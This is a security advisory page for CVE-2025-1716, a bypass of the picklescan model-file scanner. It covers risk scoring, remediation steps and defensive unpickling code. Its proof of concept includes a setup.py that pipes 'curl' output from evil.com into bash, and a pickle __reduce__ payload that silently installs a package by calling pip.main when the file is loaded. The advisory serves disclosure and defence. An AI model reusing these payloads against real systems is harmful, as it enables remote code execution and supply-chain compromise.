CVE-2025-1716: picklescan: scanner bypass enables supply chain RCE

GHSA-655q-fx9r-782v · Severity: MEDIUM · Public PoC available
Published: March 3, 2025
CISO Take

Picklescan, widely deployed as a security gate for ML model files, can be bypassed by crafting pickle payloads that invoke pip.main() — a legitimate function — to silently install malicious packages on deserialization. Any pipeline or MLOps workflow relying on picklescan as its primary defense against unsafe model files is currently exposed. Update picklescan to 0.0.22 immediately and add sandbox isolation around all pickle deserialization as defense-in-depth.

Risk Assessment

The MEDIUM advisory severity undersells operational risk for AI/ML environments. The critical factor is control bypass: organizations that implemented picklescan specifically to protect model-loading workflows now have a false sense of security. An EPSS score of ~16% combined with a public PoC elevates near-term exploitation probability. The attack surface is broad: any team using pickle-serialized models (PyTorch, scikit-learn, XGBoost, Hugging Face) with picklescan as gatekeeper is directly exposed. Severity is HIGH for ML-heavy organizations.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| picklescan | pip | <= 0.0.21 | 0.0.22 |


Severity & Risk

CVSS 3.1: N/A
EPSS: 16.2% chance of exploitation in 30 days (higher than 95% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Moderate
Exploitation Confidence: Medium (public PoC indexed in trickest/cve; EPSS exploit prediction: 16%)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

6 steps
  1. PATCH

    Update picklescan to >= 0.0.22 immediately — the fix adds pip and related callables to the unsafe globals denylist.

  2. SCAN EXISTING ARTIFACTS

    Re-scan all stored pickle files in model registries and artifact stores with the updated version.

  3. ISOLATE

    Run all pickle deserialization in network-isolated sandboxes (containers without internet access, or with egress rules blocking PyPI/GitHub). This breaks the attack chain even if scanning is bypassed.

  4. MIGRATE FORMAT

    Prioritize migration to safetensors or ONNX for model serialization — eliminate pickle dependency where feasible.

  5. MONITOR

    Alert on unexpected pip invocations or package installations originating from model-loading processes (EDR/auditd/eBPF).

  6. VERIFY

    Audit any model file scanned by picklescan <= 0.0.21 that originated from external or untrusted sources before re-use.
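The process-level telemetry in step 5 can also be complemented in-process: since Python 3.8, CPython raises a `pickle.find_class` audit event whenever an unpickler resolves a global, before the resolved callable is ever invoked. A minimal sketch of a runtime guard built on that event (the module denylist here is illustrative only; an allowlist is stronger in practice):

```python
import sys

# Illustrative denylist; real deployments should prefer an allowlist.
SUSPICIOUS_MODULES = {"pip", "subprocess", "os", "posix", "nt"}

seen = []  # record of every global an unpickler tried to resolve

def pickle_guard(event, args):
    # CPython raises "pickle.find_class" with (module, name) when the
    # unpickler resolves a global; raising here aborts the load before
    # the callable can run.
    if event == "pickle.find_class":
        module, name = args
        seen.append(f"{module}.{name}")
        if module.split(".")[0] in SUSPICIOUS_MODULES:
            raise RuntimeError(f"unpickling blocked: {module}.{name}")

sys.addaudithook(pickle_guard)
```

Note that audit hooks cannot be removed once installed, so this belongs in process startup (e.g., a `sitecustomize.py`) rather than per-request code, and it complements rather than replaces OS-level monitoring.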

CISA SSVC Assessment

Decision: Track
Exploitation: none
Automatable: yes
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
- Article 15: Accuracy, robustness and cybersecurity
- Article 17: Quality management system (supply chain)

ISO 42001
- 6.1.2: AI risk assessment
- 8.4: AI system technical robustness and security

NIST AI RMF
- GOVERN 1.7: Processes for AI risk management in supply chain
- MAP 5.1: Likelihood of supply chain risks

OWASP LLM Top 10
- LLM03:2025: Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-1716?

Picklescan, widely deployed as a security gate for ML model files, can be bypassed by crafting pickle payloads that invoke pip.main() — a legitimate function — to silently install malicious packages on deserialization. Any pipeline or MLOps workflow relying on picklescan as its primary defense against unsafe model files is currently exposed. Update picklescan to 0.0.22 immediately and add sandbox isolation around all pickle deserialization as defense-in-depth.

Is CVE-2025-1716 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-1716, increasing the risk of exploitation.

How to fix CVE-2025-1716?

1. PATCH: Update picklescan to >= 0.0.22 immediately — the fix adds pip and related callables to the unsafe globals denylist.
2. SCAN EXISTING ARTIFACTS: Re-scan all stored pickle files in model registries and artifact stores with the updated version.
3. ISOLATE: Run all pickle deserialization in network-isolated sandboxes (containers without internet access, or with egress rules blocking PyPI/GitHub). This breaks the attack chain even if scanning is bypassed.
4. MIGRATE FORMAT: Prioritize migration to safetensors or ONNX for model serialization — eliminate pickle dependency where feasible.
5. MONITOR: Alert on unexpected pip invocations or package installations originating from model-loading processes (EDR/auditd/eBPF).
6. VERIFY: Audit any model file scanned by picklescan <= 0.0.21 that originated from external or untrusted sources before re-use.

What systems are affected by CVE-2025-1716?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model repositories and registries, data science notebooks.

What is the CVSS score for CVE-2025-1716?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### CVE-2025-1716

### Summary

An unsafe deserialization vulnerability in Python's pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation.

### Details

Pickle's deserialization process allows execution of arbitrary functions via the `__reduce__` method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging `pip.main()` as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans.

The payload executes the following steps:

1. During unpickling, it calls `pip.main()` to install a malicious PyPI package.
2. The installed package runs arbitrary code via `setup.py`, `entry_points`, or post-install hooks.
3. Execution is silent, with minimal logging to avoid detection.

### PoC

Step 1: Create the malicious package. Host a PyPI package with a malicious `setup.py` or entry point. Example malicious `setup.py`:

```python
from setuptools import setup
import os

os.system("curl -s https://evil.com/payload.sh | bash")  # Executes remote shell script

setup(
    name="rsac-demo-package",
    version="0.1",
    packages=["rsac_demo"],
    install_requires=[],
)
```

Upload it to PyPI or host it on GitHub.

Step 2: Exploit via pickle:

```python
import pickle
import pip

class Exploit:
    def __reduce__(self):
        return pip.main, (
            ['install', 'git+https://github.com/madgetr/rsac-demo-package',
             '--no-input', '-q', '-q', '-q',
             '--exists-action', 'i', '--isolated'],
        )

malicious_pickle = pickle.dumps(Exploit())

# Simulating deserialization attack
pickle.loads(malicious_pickle)
```

This installs a malicious package from GitHub or PyPI. The payload runs automatically when unpickled, executing any code inside the installed package via the `setup.py` file.

### Impact

- Remote Code Execution (RCE): any system that deserializes a malicious pickle is compromised.
- Supply Chain Attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
- Bypasses Picklescan: security tools may not flag `pip.main()`, making it harder to detect.

### Recommended Fixes

Add `"pip": "*"` to the list of [unsafe globals](https://github.com/mmaitre314/picklescan/blob/25d753f4b9a27ce141a43df3bf88d731800593d9/src/picklescan/scanner.py#L96).

Exploitation Scenario

An adversary targets an ML team's internal model registry. They craft a PyTorch model file serialized with pickle that uses __reduce__ to invoke pip.main(['install', 'git+https://github.com/attacker/malicious-pkg', '--isolated', '-q', '-q', '-q']). The malicious package's setup.py executes a reverse shell or deploys a credential harvester. The attacker uploads this file to a public model hub (Hugging Face, GitHub) or injects it via a compromised dependency. The ML team's CI/CD pipeline downloads the model, runs picklescan (version <= 0.0.21), receives a clean result since pip.main is not in the unsafe globals list, and proceeds to load the model in production. Deserialization triggers the pip install silently. The malicious package executes with the same privileges as the model serving process — often a service account with access to cloud credentials, training data, and inference infrastructure.
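The scenario above succeeds only because the loader will resolve arbitrary globals. Where pickle cannot yet be eliminated, deserialization can be pinned to an explicit allowlist by overriding `Unpickler.find_class`, the approach recommended in the Python `pickle` documentation for restricting globals. A minimal sketch (the allowlist contents are illustrative and must be tailored to what your model format legitimately references):

```python
import io
import pickle

# Illustrative allowlist: only globals your model files legitimately need.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream references; anything not
        # explicitly allowed aborts the load before it can execute.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is not in the allowlist")

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Unlike a denylist, this fails closed: a `pip.main` reference (or any future bypass gadget) is rejected unless it was deliberately allowed.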

Timeline

Published
March 3, 2025
Last Modified
April 9, 2025
First Seen
March 24, 2025
